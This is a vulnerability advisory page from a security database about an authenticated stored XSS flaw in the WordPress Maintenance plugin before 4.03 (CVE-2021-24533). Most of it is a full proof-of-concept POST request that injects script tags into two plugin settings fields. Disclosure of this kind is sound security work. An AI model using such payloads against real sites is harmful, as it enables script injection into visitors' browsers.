Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitEmil kylanderWPEX-ID:174B2119-B806-4DA4-A23D-C19B552C86CB
HistoryJul 21, 2021 - 12:00 a.m.

Maintenance < 4.03 - Authenticated Stored XSS

2021-07-2100:00:00
Emil kylander
338
JSON

The plugin does not sanitise or escape some of its settings, allowing high privilege users such as admin to se Cross-Site Scripting payload in them (even when the unfiltered_html capability is disallowed), which will be triggered in the frontend

POST /wp-admin/admin.php?page=maintenance HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------76761169840134009681200665868
Content-Length: 3726
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="mtnc_nonce"

ba49a734a2
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin.php?page=maintenance
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="meta-box-order-nonce"

e668410579
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="closedpostboxesnonce"

5be06a04da
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[state]"

on
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[page_title]"

Site is undergoing maintenance
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[heading]"

Maintenance mode is on
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[description]"

Site will be available soon. Thank you for your patience!
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[footer_text]"

Ā© WP 2021
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[logo_width]"

220
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[logo_height]"


-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[logo]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[retina_logo]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_bg]"

1143
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[bg_image_portrait]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[preloader_img]"

0
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_bg_color]"

#111111
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[font_color]"

#ffffff
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[controls_bg_color]"

</style><script>alert(/XSS-controls_bg_color/);</script>
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_font_family]"

Open Sans
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[body_font_subset]"

300
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[gg_analytics_id]"


-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[blur_intensity]"

5
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[is_login]"

1
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="submit"

Save Changes
-----------------------------76761169840134009681200665868
Content-Disposition: form-data; name="lib_options[custom_css]"

</style><script>alert(/XSS-Custom-CSS/);</script>
-----------------------------76761169840134009681200665868--


Then access the homepage while in Maintenance mode

Related

patchstack 1
cve 1
wpvulndb 1
prion 1
cvelist 1
openvas 1
patchstack
patchstack
WordPress Maintenance plugin <= 4.02 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability
2021-07-21 00:00:00
cve
cve
CVE-2021-24533
2021-08-23 12:15:00
wpvulndb
wpvulndb
Maintenance < 4.03 - Authenticated Stored XSS
2021-07-21 00:00:00
prion
prion
Cross site scripting
2021-08-23 12:15:00
cvelist
cvelist
CVE-2021-24533 Maintenance < 4.03 - Authenticated Stored XSS
2021-08-23 11:10:01
openvas
openvas
WordPress Maintenance Plugin < 4.03 XSS Vulnerability
2021-09-03 00:00:00
JSON
Related for WPEX-ID:174B2119-B806-4DA4-A23D-C19B552C86CB
patchstack1cve1wpvulndb1prion1cvelist1openvas1